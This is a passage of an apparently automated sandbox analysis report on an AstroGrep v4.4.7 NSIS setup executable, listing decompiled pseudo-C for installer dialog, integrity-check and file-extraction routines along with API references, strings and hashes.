				} else {
					_t98 = _a16;
					_t113 =  *(_t98 + 0x30);
					if(_t113 < 0) {
						_t107 =  *0x42dbdc; // 0x6fdecd
						_t113 =  *(_t107 - 4 + _t113 * 4);
					}
					_push( *((intOrPtr*)(_t98 + 0x34)));
					_t114 = _t113 +  *0x42e438;
					_push(0x22);
					_a16 =  *_t114;
					_v12 = _v12 & 0x00000000;
					_t115 = _t114 + 1;
					_v16 = _t115;
					_v8 = E00404028;
					E00403F14(_a4);
					_push( *((intOrPtr*)(_t98 + 0x38)));
					_push(0x23);
					E00403F14(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
					E00403F36( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
					_t99 = GetDlgItem(_a4, 0x3e8);
					E00403F49(_t99);
					SendMessageA(_t99, 0x45b, 1, 0);
					_t86 =  *( *0x42e410 + 0x68);
					if(_t86 < 0) {
						_t86 = GetSysColor( ~_t86);
					}
					SendMessageA(_t99, 0x443, 0, _t86);
					SendMessageA(_t99, 0x445, 0, 0x4010000);
					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
					 *0x428834 = 0;
					SendMessageA(_t99, 0x449, _a16,  &_v16); // executed
					 *0x428834 = 0;
					return 0;
				}
			}




















                                                                                                            0x0040406d
                                                                                                            0x0040417f
                                                                                                            0x00404192
                                                                                                            0x004041ee
                                                                                                            0x004041ee
                                                                                                            0x004041f2
                                                                                                            0x004042c2
                                                                                                            0x004042c9
                                                                                                            0x004042cb
                                                                                                            0x004042cb
                                                                                                            0x004042cb
                                                                                                            0x004042d1
                                                                                                            0x004042d1
                                                                                                            0x004042d4
                                                                                                            0x00000000
                                                                                                            0x004042db
                                                                                                            0x00404200
                                                                                                            0x00404202
                                                                                                            0x00404205
                                                                                                            0x0040420c
                                                                                                            0x0040420e
                                                                                                            0x00404215
                                                                                                            0x00404217
                                                                                                            0x0040421a
                                                                                                            0x0040421d
                                                                                                            0x00404222
                                                                                                            0x00404228
                                                                                                            0x0040422b
                                                                                                            0x00404232
                                                                                                            0x00404240
                                                                                                            0x00404258
                                                                                                            0x0040426b
                                                                                                            0x0040427b
                                                                                                            0x0040427d
                                                                                                            0x0040427d
                                                                                                            0x00404232
                                                                                                            0x00404215
                                                                                                            0x00404280
                                                                                                            0x00404287
                                                                                                            0x00000000
                                                                                                            0x00404289
                                                                                                            0x00404289
                                                                                                            0x00404290
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00404292
                                                                                                            0x00404296
                                                                                                            0x004042a7
                                                                                                            0x004042a7
                                                                                                            0x004042a9
                                                                                                            0x004042ad
                                                                                                            0x004042bb
                                                                                                            0x004042bb
                                                                                                            0x00000000
                                                                                                            0x004042bf
                                                                                                            0x00404287
                                                                                                            0x0040419a
                                                                                                            0x0040419d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004041a5
                                                                                                            0x004041ab
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004041b1
                                                                                                            0x004041b7
                                                                                                            0x004041b7
                                                                                                            0x004041ba
                                                                                                            0x004041bd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004041e0
                                                                                                            0x004041e0
                                                                                                            0x004041e2
                                                                                                            0x004041e4
                                                                                                            0x004041e9
                                                                                                            0x00000000
                                                                                                            0x00404073
                                                                                                            0x00404073
                                                                                                            0x00404076
                                                                                                            0x0040407b
                                                                                                            0x0040407d
                                                                                                            0x0040408c
                                                                                                            0x0040408c
                                                                                                            0x00404093
                                                                                                            0x00404096
                                                                                                            0x00404098
                                                                                                            0x0040409d
                                                                                                            0x004040a6
                                                                                                            0x004040ac
                                                                                                            0x004040b8
                                                                                                            0x004040bb
                                                                                                            0x004040c4
                                                                                                            0x004040c9
                                                                                                            0x004040cc
                                                                                                            0x004040d1
                                                                                                            0x004040e8
                                                                                                            0x004040ef
                                                                                                            0x00404102
                                                                                                            0x00404105
                                                                                                            0x0040411a
                                                                                                            0x00404121
                                                                                                            0x00404126
                                                                                                            0x0040412b
                                                                                                            0x0040412b
                                                                                                            0x0040413a
                                                                                                            0x00404149
                                                                                                            0x0040415b
                                                                                                            0x00404160
                                                                                                            0x00404170
                                                                                                            0x00404172
                                                                                                            0x00000000
                                                                                                            0x00404178

                                                                                                            APIs
                                                                                                            • CheckDlgButton.USER32 ref: 004040E8
                                                                                                            • GetDlgItem.USER32 ref: 004040FC
                                                                                                            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411A
                                                                                                            • GetSysColor.USER32(?), ref: 0040412B
                                                                                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413A
                                                                                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404149
                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040414C
                                                                                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040415B
                                                                                                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404170
                                                                                                            • GetDlgItem.USER32 ref: 004041D2
                                                                                                            • SendMessageA.USER32(00000000), ref: 004041D5
                                                                                                            • GetDlgItem.USER32 ref: 00404200
                                                                                                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404240
                                                                                                            • LoadCursorA.USER32 ref: 0040424F
                                                                                                            • SetCursor.USER32(00000000), ref: 00404258
                                                                                                            • ShellExecuteA.SHELL32(0000070B,open,0042D3A0,00000000,00000000,00000001), ref: 0040426B
                                                                                                            • LoadCursorA.USER32 ref: 00404278
                                                                                                            • SetCursor.USER32(00000000), ref: 0040427B
                                                                                                            • SendMessageA.USER32(00000111,00000001,00000000), ref: 004042A7
                                                                                                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                            • String ID: (@@$N$Remove folder: $open
                                                                                                            • API String ID: 3615053054-2165829399
                                                                                                            • Opcode ID: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                                                                            • Instruction ID: c92d02d703ef172067c6e48558b1c194508f37b8d1d7228abd04d5231d4a861f
                                                                                                            • Opcode Fuzzy Hash: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                                                                            • Instruction Fuzzy Hash: 5461D3B1A40209BFEB109F21DC45F6A7B68FB44755F10807AFB00BA2D1C7B8A951CB98
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00402C66, Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 80%
                                                                                                            			E00402C66(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\ASTROGREP_SETUP_V4.4.7.EXE";
				 *0x42e40c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\hardz\\AppData\\Local\\Temp\\ASTROGREP_SETUP_V4.4.7.EXE", 0x400);
				_t89 = E004059A2(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
				E00405D2F("C:\\Users\\hardz\\AppData\\Local\\Temp", _t91);
				E00405D2F(0x436000, E004057E8(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x420424 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402C02(1);
					__eflags =  *0x42e414 - _t82;
					if( *0x42e414 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E004030C7( *0x42e414 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402E9F(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42e410 = _t94;
							 *0x42e418 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42e41c =  *0x42e41c + 1;
								__eflags =  *0x42e41c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E0040595D(0x42e420, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004030C7( *0x414418);
					_t65 = E004030B1( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42e414) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004030B1(0x420428, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402C02(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42e414;
						if( *0x42e414 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402C02(0);
							}
							goto L20;
						}
						E0040595D( &_v44, 0x420428, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x414418; // 0xe817a
						 *0x42e4a0 =  *0x42e4a0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42e414 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x409194
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x420424; // 0xe817e
						if(__eflags < 0) {
							_v12 = E0040613D(_v12, 0x420428, _t90);
						}
						 *0x414418 =  *0x414418 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}































                                                                                                            0x00402c6e
                                                                                                            0x00402c71
                                                                                                            0x00402c74
                                                                                                            0x00402c77
                                                                                                            0x00402c7d
                                                                                                            0x00402c8e
                                                                                                            0x00402c93
                                                                                                            0x00402ca6
                                                                                                            0x00402cab
                                                                                                            0x00402cae
                                                                                                            0x00402cb4
                                                                                                            0x00000000
                                                                                                            0x00402cb6
                                                                                                            0x00402cc1
                                                                                                            0x00402cc7
                                                                                                            0x00402cd8
                                                                                                            0x00402cdf
                                                                                                            0x00402ce5
                                                                                                            0x00402ce7
                                                                                                            0x00402cec
                                                                                                            0x00402cee
                                                                                                            0x00402ddb
                                                                                                            0x00402ddd
                                                                                                            0x00402de2
                                                                                                            0x00402de9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402deb
                                                                                                            0x00402dee
                                                                                                            0x00402e12
                                                                                                            0x00402e17
                                                                                                            0x00402e1d
                                                                                                            0x00402e28
                                                                                                            0x00402e2d
                                                                                                            0x00402e30
                                                                                                            0x00402e31
                                                                                                            0x00402e32
                                                                                                            0x00402e34
                                                                                                            0x00402e39
                                                                                                            0x00402e3c
                                                                                                            0x00402e4f
                                                                                                            0x00402e53
                                                                                                            0x00402e5b
                                                                                                            0x00402e60
                                                                                                            0x00402e62
                                                                                                            0x00402e62
                                                                                                            0x00402e62
                                                                                                            0x00402e6a
                                                                                                            0x00402e6a
                                                                                                            0x00402e6d
                                                                                                            0x00402e6e
                                                                                                            0x00402e6e
                                                                                                            0x00402e71
                                                                                                            0x00402e73
                                                                                                            0x00402e73
                                                                                                            0x00402e73
                                                                                                            0x00402e7d
                                                                                                            0x00402e83
                                                                                                            0x00402e91
                                                                                                            0x00402e96
                                                                                                            0x00000000
                                                                                                            0x00402e96
                                                                                                            0x00000000
                                                                                                            0x00402e3c
                                                                                                            0x00402df6
                                                                                                            0x00402e01
                                                                                                            0x00402e06
                                                                                                            0x00402e08
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402e0d
                                                                                                            0x00402e10
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402cf4
                                                                                                            0x00402cf9
                                                                                                            0x00402cfe
                                                                                                            0x00402d02
                                                                                                            0x00402d09
                                                                                                            0x00402d0e
                                                                                                            0x00402d10
                                                                                                            0x00402d12
                                                                                                            0x00402d12
                                                                                                            0x00402d16
                                                                                                            0x00402d1b
                                                                                                            0x00402d1d
                                                                                                            0x00402e47
                                                                                                            0x00402e3e
                                                                                                            0x00000000
                                                                                                            0x00402e3e
                                                                                                            0x00402d23
                                                                                                            0x00402d2a
                                                                                                            0x00402da6
                                                                                                            0x00402daa
                                                                                                            0x00402dae
                                                                                                            0x00402db3
                                                                                                            0x00000000
                                                                                                            0x00402daa
                                                                                                            0x00402d33
                                                                                                            0x00402d38
                                                                                                            0x00402d3b
                                                                                                            0x00402d40
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402d42
                                                                                                            0x00402d49
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402d4b
                                                                                                            0x00402d52
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402d54
                                                                                                            0x00402d5b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402d5d
                                                                                                            0x00402d64
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402d66
                                                                                                            0x00402d6c
                                                                                                            0x00402d75
                                                                                                            0x00402d7b
                                                                                                            0x00402d7e
                                                                                                            0x00402d80
                                                                                                            0x00402d86
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402d8c
                                                                                                            0x00402d90
                                                                                                            0x00402d98
                                                                                                            0x00402d98
                                                                                                            0x00402d9b
                                                                                                            0x00402d9b
                                                                                                            0x00402d9e
                                                                                                            0x00402da0
                                                                                                            0x00402da2
                                                                                                            0x00402da2
                                                                                                            0x00000000
                                                                                                            0x00402da0
                                                                                                            0x00402d92
                                                                                                            0x00402d96
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402db4
                                                                                                            0x00402db4
                                                                                                            0x00402dba
                                                                                                            0x00402dc6
                                                                                                            0x00402dc6
                                                                                                            0x00402dc9
                                                                                                            0x00402dcf
                                                                                                            0x00402dd1
                                                                                                            0x00402dd1
                                                                                                            0x00402dd9
                                                                                                            0x00402dd9
                                                                                                            0x00000000
                                                                                                            0x00402dd9

                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00402C77
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE,00000400), ref: 00402C93
                                                                                                              • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE,80000000,00000003), ref: 004059A6
                                                                                                              • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE,C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE,80000000,00000003), ref: 00402CDF
                                                                                                            Strings
                                                                                                            • Inst, xrefs: 00402D4B
                                                                                                            • Null, xrefs: 00402D5D
                                                                                                            • Error launching installer, xrefs: 00402CB6
                                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D
                                                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00402CC1, 00402CC6, 00402CCC
                                                                                                            • C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
                                                                                                            • soft, xrefs: 00402D54
                                                                                                            • "C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" , xrefs: 00402C66
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                            • String ID: "C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" $C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                            • API String ID: 4283519449-3703063560
                                                                                                            • Opcode ID: b279afc3802d50bf57e9722da1946117fb0678ac622cf15a6dcee51f72b17406
                                                                                                            • Instruction ID: 2dd8a40a4a6da4a25a7ff80ffc2ca296f3ca1cc65932c4217ff60142993c7b59
                                                                                                            • Opcode Fuzzy Hash: b279afc3802d50bf57e9722da1946117fb0678ac622cf15a6dcee51f72b17406
                                                                                                            • Instruction Fuzzy Hash: 9651F771940214ABDF20AF65DE89B9E7AA8EF04714F54803BF504B72D2C7BC9D418BAD
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00401751, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 60%
                                                                                                            			E00401751(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A3A(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E0040580E(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E004057A1(E00405D2F(0x409410, "C:\\Program Files (x86)\\AstroGrep")), ??);
				} else {
					_push(0x409410);
					E00405D2F();
				}
				E00405F9A(0x409410);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00406033(0x409410);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040597D(0x409410);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E004059A2(0x409410, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404F48(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42e488;
						goto L32;
					} else {
						E00405D2F(0x409c10, 0x42f000);
						E00405D2F(0x42f000, 0x409410);
						E00405D51(_t75, 0x409c10, 0x409410, "C:\Users\hardz\AppData\Local\Temp\nsq211B.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405D2F(0x42f000, 0x409c10);
						_t62 = E00405525("C:\Users\hardz\AppData\Local\Temp\nsq211B.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42e488 =  &( *0x42e488->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409410);
								_push(0xfffffffa);
								E00404F48();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404F48(0xffffffea,  *(_t85 - 8)); // executed
				 *0x42e4b4 =  *0x42e4b4 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0xc));
				_push( *((intOrPtr*)(_t85 - 0x20)));
				_t43 = E00402E9F(); // executed
				 *0x42e4b4 =  *0x42e4b4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405D51(_t75, _t80, 0x409410, 0x409410, 0xffffffee);
					} else {
						E00405D51(_t75, _t80, 0x409410, 0x409410, 0xffffffe9);
						lstrcatA(0x409410,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409410);
					E00405525();
					goto L29;
				}
				goto L33;
			}
















                                                                                                            0x00401751
                                                                                                            0x00401758
                                                                                                            0x00401761
                                                                                                            0x00401764
                                                                                                            0x00401767
                                                                                                            0x0040176c
                                                                                                            0x00401774
                                                                                                            0x00401790
                                                                                                            0x00401776
                                                                                                            0x00401776
                                                                                                            0x00401777
                                                                                                            0x00401777
                                                                                                            0x00401796
                                                                                                            0x004017a0
                                                                                                            0x004017a0
                                                                                                            0x004017a4
                                                                                                            0x004017a7
                                                                                                            0x004017ac
                                                                                                            0x004017ae
                                                                                                            0x004017b0
                                                                                                            0x004017b5
                                                                                                            0x004017b5
                                                                                                            0x004017c0
                                                                                                            0x004017c0
                                                                                                            0x004017d1
                                                                                                            0x004017d3
                                                                                                            0x004017d3
                                                                                                            0x004017d4
                                                                                                            0x004017d4
                                                                                                            0x004017d7
                                                                                                            0x004017da
                                                                                                            0x004017dd
                                                                                                            0x004017dd
                                                                                                            0x004017e4
                                                                                                            0x004017f3
                                                                                                            0x004017f8
                                                                                                            0x004017fb
                                                                                                            0x004017fe
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00401800
                                                                                                            0x00401803
                                                                                                            0x0040185d
                                                                                                            0x00401862
                                                                                                            0x004015a8
                                                                                                            0x004026a6
                                                                                                            0x004026a6
                                                                                                            0x004028cf
                                                                                                            0x004028d2
                                                                                                            0x004028d2
                                                                                                            0x00000000
                                                                                                            0x00401805
                                                                                                            0x0040180b
                                                                                                            0x00401816
                                                                                                            0x00401823
                                                                                                            0x0040182e
                                                                                                            0x00401844
                                                                                                            0x00401844
                                                                                                            0x00401847
                                                                                                            0x00000000
                                                                                                            0x0040184d
                                                                                                            0x0040184d
                                                                                                            0x0040184e
                                                                                                            0x0040186b
                                                                                                            0x004028d8
                                                                                                            0x004028d8
                                                                                                            0x004028d8
                                                                                                            0x00401850
                                                                                                            0x00401850
                                                                                                            0x00401851
                                                                                                            0x00401492
                                                                                                            0x0040226e
                                                                                                            0x0040226e
                                                                                                            0x0040226e
                                                                                                            0x0040184e
                                                                                                            0x00401847
                                                                                                            0x004028da
                                                                                                            0x004028de
                                                                                                            0x004028de
                                                                                                            0x0040187b
                                                                                                            0x00401880
                                                                                                            0x00401886
                                                                                                            0x00401887
                                                                                                            0x00401888
                                                                                                            0x0040188b
                                                                                                            0x0040188e
                                                                                                            0x00401893
                                                                                                            0x00401899
                                                                                                            0x0040189d
                                                                                                            0x0040189f
                                                                                                            0x004018a7
                                                                                                            0x004018b3
                                                                                                            0x004018a1
                                                                                                            0x004018a1
                                                                                                            0x004018a5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004018a5
                                                                                                            0x004018bc
                                                                                                            0x004018c2
                                                                                                            0x004018c4
                                                                                                            0x00000000
                                                                                                            0x004018ca
                                                                                                            0x004018ca
                                                                                                            0x004018cd
                                                                                                            0x004018e5
                                                                                                            0x004018cf
                                                                                                            0x004018d2
                                                                                                            0x004018db
                                                                                                            0x004018db
                                                                                                            0x004018ea
                                                                                                            0x004018ef
                                                                                                            0x00402269
                                                                                                            0x00000000
                                                                                                            0x00402269
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Program Files (x86)\AstroGrep,00000000,00000000,00000031), ref: 00401790
                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Program Files (x86)\AstroGrep,00000000,00000000,00000031), ref: 004017BA
                                                                                                              • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,AstroGrep v4.4.7 Setup,NSIS Error), ref: 00405D3C
                                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,0075D8B4,74B5EA30,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,0075D8B4,74B5EA30,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
